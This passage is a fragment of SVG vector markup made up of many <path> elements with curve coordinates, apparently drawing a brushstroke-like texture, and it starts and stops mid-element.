d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n <path 